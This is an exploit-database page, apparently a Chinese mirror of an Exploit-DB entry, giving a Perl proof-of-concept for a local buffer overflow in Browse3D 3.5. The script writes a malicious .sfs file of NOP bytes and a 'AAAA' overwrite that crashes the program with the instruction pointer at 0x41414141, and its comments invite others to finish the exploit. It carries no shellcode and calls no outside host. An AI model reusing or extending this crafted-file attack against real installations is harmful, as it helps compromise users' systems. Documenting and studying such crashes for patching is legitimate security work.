Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057262 漏洞类型
发布时间 2009-01-11 更新时间 2009-01-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7721
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl -w

# -- Viva Gazza -- Viva Palestine --

# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe

# Author : Houssamix

# create file exploit > open it > 
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.

# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !

print "===================================================================== \n";
print "Author : Houssamix 						    \n";
print "===================================================================== \n";
print "Browse3D v3.5 Local Buffer overflow PoC				  \n";
print "===================================================================== \n";

my $adresse = "AAAA" ; 
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it  with Browse3D v 3.5\n";

# milw0rm.com [2009-01-11]